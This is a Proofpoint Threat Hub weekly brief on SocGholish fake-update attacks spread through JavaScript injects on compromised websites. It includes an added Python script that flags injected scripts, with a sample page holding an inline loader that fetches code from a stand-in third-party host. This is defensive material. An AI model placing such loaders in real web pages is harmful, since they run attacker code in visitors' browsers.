Threat Hub

The Proofpoint threat research team has access to one of the largest, most diverse data sets in all of cybersecurity. We’re bringing you the highlights every week, right here at the Threat Hub.

Weekly Brief

SocGholish: real updates on a fake-update attack. And the latest Emotet developments on our podcast.

This week on The Threat Hub: Most of the malware we talk about on the Hub is delivered by malicious links or attachments embedded in email. But SocGholish, distributed by threat actor TA569, is different. This malware spreads through JavaScript injects on compromised websites. There can be hundreds, even thousands, of websites injected at any one time, and anyone visiting them has the potential to be attacked. The mechanism of infection is a fake browser update prompt that appears only if the visitor meets certain criteria. Once a system is infected, TA569 can launch a range of follow-on attacks, including selling access on to ransomware operators. We've just published part one of a deep dive into SocGholish on the Threat Insight blog, with part two coming soon.
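Because the lure is gated on visitor criteria, fetching a page with a scanner may never show the fake update prompt; the injected loader in the served HTML, however, is what a site owner can actually look for. The following is an added example of that check, not Proofpoint's code and not taken from the blog or the webinar: it parses a page's HTML, collects every external script source and every inline script that builds a `<script>` element at runtime, and flags any that pull code from a host other than the site itself or an explicit allowlist. The host names and the sample page are constructed for the example and are not SocGholish indicators.

```python
"""Flag candidate JavaScript injects in a page's HTML.

Added example, not Proofpoint code. It applies the generic pattern described
above (an inline script on a compromised site that pulls a second-stage
script from a third-party host). All hosts and the sample page are constructed
input, not real indicators.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collect external script src values and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute values of <script src=...>
        self.inline = []     # bodies of inline <script> elements
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


# Inline code that creates a <script> element at runtime: a common loader
# shape, since the second-stage URL can change without re-editing the page.
_DYNAMIC_LOADER = re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)", re.I)
# Absolute or protocol-relative URL string literals inside that inline code.
_URL_LITERAL = re.compile(r"""['"]((?:https?:)?//[^'"\s]+)['"]""")


def _host(url):
    """Host of an absolute or protocol-relative URL; '' for relative paths."""
    if url.startswith("//"):
        url = "https:" + url
    return urlparse(url).hostname or ""


def find_injected_scripts(html, site_host, allowlist=()):
    """Return (kind, host) findings for scripts loaded from hosts that are
    neither the site's own nor on the allowlist (e.g. a known CDN)."""
    trusted = {site_host, *allowlist}
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = _host(src)
        if host and host not in trusted:
            findings.append(("external-src", host))
    for body in parser.inline:
        if _DYNAMIC_LOADER.search(body):
            for url in _URL_LITERAL.findall(body):
                host = _host(url)
                if host and host not in trusted:
                    findings.append(("dynamic-loader", host))
    return findings


# Constructed sample page: a same-origin script, an allowlisted CDN script and
# one inline loader that fetches a script from an unknown third-party host.
SAMPLE_HTML = """
<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-cdn.net/lib.js"></script>
<script>
  var s = document.createElement('script');
  s.src = 'https://third-party.invalid/loader.js';
  document.head.appendChild(s);
</script>
</head><body><p>Welcome</p></body></html>
"""

if __name__ == "__main__":
    for kind, host in find_injected_scripts(
        SAMPLE_HTML, "www.example.org", allowlist=["cdn.example-cdn.net"]
    ):
        print(f"{kind}: {host}")
```

Run it against the HTML as served to visitors (not the CMS source), since an inject typically lives in a theme file, plugin or database-backed template rather than in content you edit by hand. Any host it reports that you do not recognise deserves a look at the loaded script, and the allowlist should stay short: every entry on it is a host you are trusting to run code on your visitors' browsers.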

But if you’re eager to find out more now, blog author Andrew Northern recently gave a webinar update on SocGholish. At the start of the month this malware was implicated in a supply chain attack affecting hundreds of media websites. The webinar recording contains a rundown of attack chains, TA569 TTPs and tips on how to stay ahead of the threat.

And on this week’s Five-Minute Forecast, a Twitter data breach exposes millions of phone numbers, U.S. authorities seize “pig butchering” sites, and senior reverse engineer Pim Trouerbach shares the latest Emotet developments.

Insights Chart of the Week
SocGholish to Ransomware
Fake Update, Real Ransomware

The group behind SocGholish moves fast. In as little as 96 hours, ransomware can be installed on a machine infected with the initial SocGholish payload. It's likely that TA569 acts as an initial access facilitator for other threat actors.

Equip your team with threat intelligence

Threat Report
2022 Spring/Summer Threat Summary

Reviewing state-sponsored attacks and major league malware activity from the first half of the year.

Blog Post
How Smishing Operations Abuse Legitimate Services

Messaging services help businesses communicate with users at scale, but they're also a target for abuse.

Threat Insight
How Threat Actors Hijacked a Pandemic

Exploring two years of attacks and lures exploiting fear and uncertainty about COVID-19.


Go Deeper with Proofpoint Threat Intelligence Services

Connect with threat analysts, understand threats with intelligence specific to your situation, and gain 24/7 visibility into the latest threat discoveries.

REPORTS
Threat Report
The Human Factor - Vol. 1: Social Engineering

Cyberattackers target people. They exploit people. Ultimately, they are people. That’s why the Human Factor report focuses on how technology and psychology combine to make people so susceptible to modern cyber threats. In this first volume, we take a closer look at attacks that rely on social engineering, including business email compromise (BEC) threats, email fraud and phishing.

Threat Report
2024 State of the Phish – Today’s Cyber Threats and Phishing Protection

Find out how vulnerable your users are to today’s biggest cyber threats in the 2024 State of the Phish report. Learn phishing trends, key insights, statistics, and more.


About The Threat Research Team

Our threat researchers are responsible for tracking shifts in the cybersecurity landscape, identifying new attacks as they emerge, and monitoring how threat actor tactics, techniques and procedures change over time. The threats they detect and the signatures they write feed into our platforms and are keystones in a system that analyzes more than 2.6 billion emails, 49 billion URLs and 1.9 billion attachments every single day.

By studying what cyber criminals are doing now, our threat researchers are better able to anticipate what they’ll do next. Every day, their work keeps our customers protected—not just from today’s attacks, but tomorrow’s threats as they evolve.